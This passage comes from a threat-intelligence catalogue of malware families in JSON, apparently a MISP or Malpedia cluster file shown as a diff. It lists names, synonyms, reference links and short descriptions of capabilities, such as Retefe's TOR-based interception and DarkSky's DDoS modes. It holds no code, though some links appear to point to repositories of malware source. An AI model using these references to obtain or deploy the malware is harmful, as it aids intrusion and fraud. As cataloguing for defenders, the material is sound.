Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. 
The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic.", - "meta": { - "synonyms": [ - "Werdlod", - "Tsukuba" - ], - "type": [], - "refs": [ - "https://github.com/cocaman/retefe", - "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga", - "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/" - ] - } - }, - { - "uuid": "606f778a-8b99-4880-8da8-b923651d627b", - "value": "PowerRatankba", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" - ] - } - }, - { - "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0", - "value": "Zebrocy (AutoIT)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" - ] - } - }, - { - "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb", - "value": "Darksky", - "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. 
The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://telegra.ph/Analiz-botneta-DarkSky-12-30", - "https://blog.radware.com/security/2018/02/darksky-botnet/", - "https://github.com/ims0rry/DarkSky-botnet" - ] - } - }, - { - "uuid": "3a26ee44-3224-48f3-aefb-3978c972d928", - "value": "NetTraveler", - "description": "", - "meta": { - "synonyms": [ - "TravNet" - ], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", - "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf" - ] - } - }, - { - "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", - "value": "Crypt0l0cker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html" - ] - } - }, - { - "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", - "value": "Empire Downloader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/thor_scanner/status/992036762515050496" - ] - } - }, - { - "uuid": "83c3aacc-4d13-4ce2-aced-f11b03f12efe", - "value": "win.flusihoc", - "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. 
Flusihoc communicates with its C2 via HTTP in plain text.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/" - ] - } - }, - { - "uuid": "4db94d24-209a-4edd-b175-3a3085739b94", - "value": "Colony", - "description": "", - "meta": { - "synonyms": [ - "Bandios", - "GrayBird" - ], - "type": [], - "refs": [ - "https://twitter.com/anyrun_app/status/976385355384590337", - "https://secrary.com/ReversingMalware/Colony_Bandios/", - "https://pastebin.com/GtjBXDmz" - ] - } - }, - { - "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", - "value": "SeaSalt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601", - "value": "Dairy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", - "value": "Crossrider", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social" - ] - } - }, - { - "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2", - "value": "JripBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" - ] - } - }, - { - "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", - "value": "Socks5 Systemz", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe", - "value": "EtumBot", - "description": "", - "meta": { - "synonyms": [ - "HighTide" 
- ], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", - "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html", - "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise" - ] - } - }, - { - "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", - "value": "Golroted", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" - ] - } - }, - { - "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9", - "value": "Elirks", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] - } - }, - { - "uuid": "2789b246-d762-4d38-8cc8-302293e314da", - "value": "LogPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" - ] - } - }, - { - "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1", - "value": "InnaputRAT", - "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. 
Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" - ] - } - }, - { - "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", - "value": "PadCrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/", - "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/" - ] - } - }, - { - "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", - "value": "FriedEx", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - ] - } - }, - { - "uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2", - "value": "Darkmoon", - "description": "", - "meta": { - "synonyms": [ - "Chymine" - ], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", - "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml", - "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html" - ] - } - }, - { - "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f", - "value": "Gameover P2P", - "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. 
Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.", - "meta": { - "synonyms": [ - "ZeuS P2P", - "GOZ" - ], - "type": [], - "refs": [ - "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf", - "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", - "https://www.wired.com/?p=2171700", - "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", - "https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf" - ] - } - }, - { - "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5", - "value": "BatchWiper", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" - ] - } - }, - { - "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", - "value": "GuiInject", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/" - ] - } - }, - { - "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26", - "value": "PubNubRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" - ] - } - }, - { - "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", - "value": "Magniber", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", - "https://www.youtube.com/watch?v=lqWJaaofNf4", - "http://asec.ahnlab.com/1124" - ] - } - }, - { - "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec", - "value": "Murofet", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": 
"8468f2a7-f541-4130-b57a-ea678aa30a0a", - "value": "Mokes", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" - ] - } - }, - { - "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", - "value": "EDA2", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/815861135882780673" - ] - } - }, - { - "uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0", - "value": "Felismus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" - ] - } - }, - { - "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", - "value": "SunOrcal", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", - "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" - ] - } - }, - { - "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369", - "value": "Sathurbot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" - ] - } - }, - { - "uuid": "aff47054-7130-48ca-aa2c-247bdf44f180", - "value": "Unidentified 029", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", - "value": "Lambert", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://adelmas.com/blog/longhorn.php", - "https://www.youtube.com/watch?v=jeLd-gw2bWo", - "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", - "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" - ] - } - 
}, - { - "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", - "value": "GPCode", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", - "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/", - "https://de.securelist.com/analysis/59479/erpresser/", - "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", - "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2" - ] - } - }, - { - "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", - "value": "Bedep", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", - "value": "HerpesBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846", - "value": "Ranbyus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", - "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/", - "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", - "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/" - ] - } - }, - { - "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937", - "value": "Nymaim", - "description": "", - "meta": { - "synonyms": [ - "nymain" - ], - "type": [], - "refs": [ - "https://www.cert.pl/en/news/single/nymaim-revisited/" - ] - } - }, - { - "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993", - "value": "Xpan", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/78110/xpan-i-am-your-father/", - "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/" - ] - } - }, - { - "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", - 
"value": "Odinaff", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" - ] - } - }, - { - "uuid": "9218630d-0425-4b18-802c-447a9322990d", - "value": "Zollard", - "description": "", - "meta": { - "synonyms": [ - "darlloz" - ], - "type": [], - "refs": [ - "https://blogs.cisco.com/security/the-internet-of-everything-including-malware" - ] - } - }, - { - "uuid": "40c66571-164c-4050-9c84-f37c9cd84055", - "value": "Unidentified 020 (Vault7)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://wikileaks.org/ciav7p1/cms/page_34308128.html" - ] - } - }, - { - "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", - "value": "TorrentLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/", - "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/" - ] - } - }, - { - "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b", - "value": "Cutwail", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66", - "value": "gamapos", - "description": "", - "meta": { - "synonyms": [ - "pios" - ], - "type": [], - "refs": [ - "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf" - ] - } - }, - { - "uuid": "d8295eba-60ef-4900-8091-d694180de565", - "value": "Nautilus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.ncsc.gov.uk/alerts/turla-group-malware" - ] - } - }, - { - "uuid": "7be3f3b3-5047-4422-ad9d-86a7bc321931", - "value": "X-Agent", - "description": "", - "meta": { - "synonyms": [ - "splm", - "chopstick" - ], - "type": [], - "refs": [ - 
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" - ] - } - }, - { - "uuid": "af1c99be-e55a-473e-abed-726191e1da05", - "value": "BadEncript", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/PhysicalDrive0/status/833067081981710336" - ] - } - }, - { - "uuid": "8f78a226-1314-4778-9bc2-ca850e9e0037", - "value": "X-Agent", - "description": "", - "meta": { - "synonyms": [ - "Popr-d30" - ], - "type": [], - "refs": [ - "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/", - "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/" - ] - } - }, - { - "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", - "value": "Allaple", - "description": "", - "meta": { - "synonyms": [ - "Starman" - ], - "type": [], - "refs": [ - "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf", - "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/" - ] - } - }, - { - "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", - "value": "Naikon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", - "value": "FruitFly", - "description": "", - "meta": { - "synonyms": [ - "Quimitchin" - ], - "type": [], - "refs": [ - "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", - 
"https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", - "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", - "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", - "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" - ] - } - }, - { - "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", - "value": "ThumbThief", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" - ] - } - }, - { - "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", - "value": "CCleaner Backdoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", - "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", - "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", - "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", - "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", - "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", - "https://blog.avast.com/progress-on-ccleaner-investigation", - "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", - "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", - "https://twitter.com/craiu/status/910148928796061696", - "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", - "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", - 
"https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", - "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" - ] - } - }, - { - "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", - "value": "ARS VBS Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", - "https://twitter.com/Racco42/status/1001374490339790849" - ] - } - }, - { - "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a", - "value": "Nocturnal Stealer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap" - ] - } - }, - { - "uuid": "72961adc-ace1-4593-99f1-266119ddeccb", - "value": "Unidentified 001", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", - "value": "ThunderShell", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/Mr-Un1k0d3r/ThunderShell" - ] - } - }, - { - "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb", - "value": "Karagany", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - } - }, - { - "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", - "value": "Ghole", - "description": "", - "meta": { - "synonyms": [ - "CoreImpact (Modified)" - ], - "type": [], - "refs": [ - "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", - "https://www.coresecurity.com/core-impact" - ] - } - }, - { - "uuid": "989330e9-52da-4489-888b-686429db3a45", - "value": "ZhMimikatz", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4", - "value": "Vreikstadi", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/malware_traffic/status/821483557990318080" - ] - } - }, - { - "uuid": "1a1fd8f1-1fe4-4dc7-bbef-ad0563db3010", - "value": "win.phorpiex", - "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.", - "meta": { - "synonyms": [ - "Trik" - ], - "type": [], - "refs": [ - "https://www.johannesbader.ch/2016/02/phorpiex/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", - "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/", - "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows" - ] - } - }, - { - "uuid": "246060e5-1685-4e97-a6c6-994b3879c8fa", - "value": "Crisis", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", - "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", - "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" - ] - } - }, - { - "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", - "value": "Stinger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985", - "value": "HTML5 Encoding", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" - ] - } - }, - { - "uuid": 
"ce25929c-0358-477c-a85e-f0bdfcc99a54", - "value": "AMTsol", - "description": "", - "meta": { - "synonyms": [ - "Adupihan" - ], - "type": [], - "refs": [ - "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", - "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" - ] - } - }, - { - "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", - "value": "CsExt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", - "value": "Thanatos Ransomware", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html", - "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/", - "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/" - ] - } - }, - { - "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", - "value": "DiamondFox", - "description": "", - "meta": { - "synonyms": [ - "Crystal", - "Gorynch", - "Gorynych" - ], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", - "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", - "https://www.scmagazine.com/inside-diamondfox/article/578478/", - "https://blog.cylance.com/a-study-in-bots-diamondfox", - "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/" - ] - } - }, - { - "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", - "value": "Spora", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", - "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", - "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", - "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware", - "https://github.com/MinervaLabsResearch/SporaVaccination", - "http://malware-traffic-analysis.net/2017/01/17/index2.html" - ] - } - }, - { - "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d", - "value": "Matryoshka RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.clearskysec.com/tulip/" - ] - } - }, - { - "uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757", - "value": "Unidentified 042", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/" - ] - } - }, - { - "uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c", - "value": "TinyTyphon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" - ] - } - }, - { - "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", - "value": "Uroburos", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/", - "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/" - ] - } - }, - { - "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", - "value": "NavRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" - ] - } - }, - { - "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", - "value": "CryptoMix", - "description": "", - "meta": { - "synonyms": [ - "CryptFile2" - ], - "type": [], - 
"refs": [ - "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/", - "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/" - ] - } - }, - { - "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", - "value": "Havex RAT", - "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. 
